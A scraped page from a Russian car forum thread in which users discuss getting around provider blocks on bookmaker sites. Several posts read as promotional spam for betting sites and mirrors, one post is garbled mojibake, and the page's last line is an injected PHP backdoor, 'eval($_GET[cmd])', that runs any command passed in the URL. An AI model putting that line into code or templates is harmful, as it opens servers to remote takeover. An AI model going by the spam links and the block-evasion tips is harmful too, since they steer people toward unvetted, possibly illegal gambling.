+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя
Показано с 11 по 20 из 21

Тема: Как зайти на букмекерские сайты?


  1. #11
    Мимо проходил Masewrol is on a distinguished road Аватар для Masewrol
    Регистрация
    28.01.2019
    Откуда
    Россия
    Машина
    Gof 6
    Сообщений
    64
    Я бы вам вообще не советовал связываться с азартными играми. так как ни к чему хорошему это не приводит. Если вы азартный человек, то вам будет тяжело вовремя остановиться. И можно все проиграть. Подумайте об этом.

  2. #12
    Мимо проходил Doper is on a distinguished road Аватар для Doper
    Регистрация
    27.12.2018
    Откуда
    Россия
    Машина
    Volkswagen
    Сообщений
    71
    Цитата Сообщение от Renegat Посмотреть сообщение
    Как зайти на букмекерские сайты? Что-то меня потянуло на ставки, в основном хочу ставить на футбольные матчи. Но какой букмекерский сайт не найду в Яндексе, он заблокирован провайдером, может подскажите как обойти эту блокировку и вообще безопасно ли на таких сайтах делать ставки? Платят ли они вообще?
    Этот вопрос, достаточно распространенный, особенно у начинающих игроков. Просто сейчас очень много развелось нелегальных букмекеров, их и блокируют. Ищите легальные конторы, прежде чем, где-либо регистрироваться, тщательно изучите информацию на сайте букмекера, читайте отзывы. Например, здесь можете посмотреть рейтинг букмекерских контор https://promokod-bonusbet.ru/ .

  3. #13
    Мимо проходил Rita25 is on a distinguished road Аватар для Rita25
    Регистрация
    26.11.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    22
    Может вы ставите в нелегальной БК и ее заблочили просто? Или используйте зеркало, или лучше переходите на легальную, например https://1xbet.tj работает давно и имеет хорошую репутацию, выплаты гарантированы и нет проблем с входом на сайт

  4. #14
    Мимо проходил Shafralik is on a distinguished road Аватар для Shafralik
    Регистрация
    28.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    9
    Я обычно через официальный сайт Париматч спокойно себе захожу и играю прекрасно[COLOR="Silver"]

    ---------- Сообщение добавлено в 15:56 ---------- Предыдущее сообщение размещено в 15:20 ----------

  5. #15
    Мимо проходил Dabamer is on a distinguished road Аватар для Dabamer
    Регистрация
    30.03.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    20
    Да этих контор много уже появилось - только более 20 есть легальных с нормальными выплатами. Тут еще следует учитывать , что нужно и прогнозы на спорт https://rockasport.net использовать адекватные , которые и помогут сделать точные ставки. Сам ими пользуюсь и после небольшого анализа уже ставлю.

  6. #16
    Мимо проходил Shafralik is on a distinguished road Аватар для Shafralik
    Регистрация
    28.04.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    9
    пїЅпїЅ пїЅпїЅпїЅ пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ - пїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅ пїЅпїЅпїЅпїЅпїЅ , пїЅпїЅпїЅпїЅпїЅпїЅпїЅпїЅ пїЅпїЅпїЅ

    ---------- Сообщение добавлено в 19:19 ---------- Предыдущее сообщение размещено в 19:16 ----------

    Всегла стоит делать ставки вдумиво , продумав каждый шаг

    ---------- Сообщение добавлено в 19:19 ---------- Предыдущее сообщение размещено в 19:19 ----------

    Всегда следует делать ставки вдумчиво , продумав каждый шаг - это важный момент

  7. #17
    GTI-Racing Magistral is on a distinguished road Аватар для Magistral
    Регистрация
    11.12.2010
    Откуда
    Москва
    Машина
    Golf
    Сообщений
    156
    Букмекерские конторы блокируют не потому, что они плохие. А потому, что они не хотят регистрировать свои офисы тут и сливать данные игроков. Потому я таким и доверяю, которые не имеют тут лицензии. А играть в них без проблем можно. Я вот использую 1хБет зеркало и всегда могу войти в любое время в БК и сделать ставку.

  8. #18
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    к сожалению, довольно часто сейчас блокируются сайты различных букмекерских контор, даже официальных, поэтому бывает сложно зайти туда чтобы поиграть на ставках
    я недавно тоже приобщился к этому варианту заработка и развлечения, нашёл тут https://betinsider.ru/marafon-zerkalo.htm информацию про БК Марафон, там же смог найти заодно и рабочее зеркало, через которое можно заходить на сайт и без каких либо проблем делать ставки в своё удовольствие

  9. #19
    Мимо проходил Левша is on a distinguished road Аватар для Левша
    Регистрация
    12.12.2018
    Откуда
    Россия
    Машина
    Ездит
    Сообщений
    90
    Я лично вообще ни разу в жизни не делал ставки у букмекеров - почему-то мне стремно нести туда свои кровно заработанные денежки.

  10. #20
    Мимо проходил Kirillov is on a distinguished road Аватар для Kirillov
    Регистрация
    13.12.2018
    Машина
    Есть
    Сообщений
    78
    Ну, если бы я в спорте совершенно не разбирался, то я бы тоже не стал лезть в эти букмекерские дебри. А так почему бы и нет? Ведь это возможность поднять неплохие деньги.

+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Ответов: 10
    Последнее сообщение: 29.06.2010, 20:14
  2. Сайты По Тюнингу Golf
    от GTI or DIE в разделе Стайлинг: кузов, салон, свет и прочее
    Ответов: 6
    Последнее сообщение: 12.08.2008, 17:41
  3. Ответов: 5
    Последнее сообщение: 16.08.2007, 12:53
  4. Сайты
    от Ler4ik в разделе Курилка
    Ответов: 18
    Последнее сообщение: 16.07.2007, 10:34

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}